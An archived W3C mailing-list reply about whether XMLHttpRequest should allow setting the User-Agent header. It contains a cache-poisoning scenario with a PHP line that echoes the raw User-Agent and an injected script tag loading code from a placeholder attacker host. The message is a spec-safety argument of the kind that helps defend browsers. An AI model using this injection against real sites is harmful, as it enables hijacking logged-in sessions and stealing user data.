W3C home > Mailing lists > Public > public-webapps@w3.org > October to December 2012

Re: Re: [XHR] Open issue: allow setting User-Agent?

From: Hallvord Reiar Michaelsen Steen <hallvord@opera.com>
Date: Tue, 16 Oct 2012 14:44:49 +0200
To: "Jungkee Song" <jungkee.song@samsung.com>, "Boris Zbarsky" <bzbarsky@mit.edu>
Cc: "Julian Aubourg" <j@ubourg.net>, public-webapps@w3.org
Message-ID: <75bcb8cb7dfb1efe3570de97c3ac8353@opera.com>
> While true, a third party can already do this with things like botnets, 
> no?  I'm not sure I see the additional threats here.  Can you explain?



Consider a "valuable target" site, victim.com, which has enabled CORS for a subset of its pages, say /publicdata/index.htm . These pages also contain some debug output in a comment, which they never thought of disabling, say this in one of their PHP backend scripts:


<?php echo '<!-- '.$_SERVER['HTTP_USER_AGENT'].'-->';?>


Now, attacker wants to abuse your current logged-in session with victim.com to steal some data, like your credit card number shown in our profile page. Attacher therefore tricks you into going to a special page which does 



xhr=new XMLHttpRequest();
xhr.setRequestHeader('User-Agent', '--><script src="http://attacker.com/malice.js"></script><!--');


and then requests /publicdata/index.htm . Once the request reaches readyState=4, attacker's page does 


location.href='http://www.victim.com/publicdata/index.htm';


The browser has a fresh copy - loaded with the xhr request just milliseconds ago - and fetches the page from cache. Voila, the browser is now rendering a victim.com page with a link to malice.js included and the attacker can do whatever from the JS now running in the scope of the site.


Now, per CORS the victim.com site would have to opt-in to a customized User-Agent header. The browser would send a preflight with 


Access-Control-Request-Headers: User-Agent


and the server would have to opt-in by returning a header saying 


Access-Control-Allow-Headers: User-Agent


so the threat scenario relies on the remote server being stupid enough to do that and yet be careless about echoing non-sanitised User-Agent strings back to the page. Which is basically the negotiation scenario Julian earlier said he would agree to, and the reason I'm still pondering if it would be worth the extra complexity to allow it for cross-domain requests only...but this sort of "cache poisoning" scenario is a concern.. 


Perhaps navigating to a URL that was previously loaded with CORS should always consider the existing cache entry stale and get a new file from server, anyway? This threat scenario may be more general than User-Agent headers in particular.. I guess Anne can comment on that, he knows CORS better.

-- 
Hallvord R. M. Steen
Core tester, Opera Software
Received on Tuesday, 16 October 2012 12:51:52 GMT

This archive was generated by hypermail 2.3.1 : Tuesday, 26 March 2013 18:49:55 GMT